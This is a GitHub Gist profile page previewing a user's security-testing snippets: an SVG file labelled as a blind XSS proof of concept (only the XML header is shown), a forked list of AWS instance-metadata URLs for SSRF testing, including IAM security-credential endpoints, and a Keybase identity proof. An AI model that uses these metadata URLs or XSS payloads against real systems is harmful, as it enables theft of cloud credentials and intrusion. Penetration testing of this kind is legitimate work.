Skip to content

Instantly share code, notes, and snippets.

View l34r00t's full-sized avatar
🏠
Working from home

l34r00t l34r00t

🏠
Working from home
37 followers · 4 following
  • Buenos Aires - Argentina
View GitHub Profile
@l34r00t
l34r00t / svg_poc.txt
Last active November 24, 2022 08:47
Blind XSS in SVG FILE
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"
height="200"
zoomAndPan="disable"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:space="preserve">
@l34r00t
l34r00t / cloud_metadata.txt
Created November 24, 2022 08:39 — forked from rudSarkar/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@l34r00t
l34r00t / keybase.md
Created December 11, 2019 19:34

Keybase proof

I hereby claim:

  • I am l34r00t on github.
  • I am l34r00t (https://keybase.io/l34r00t) on keybase.
  • I have a public key whose fingerprint is E93A E09C D9F4 BB03 9D43 97E0 6CF9 037D EFB6 D0E4

To claim this, I am signing this object: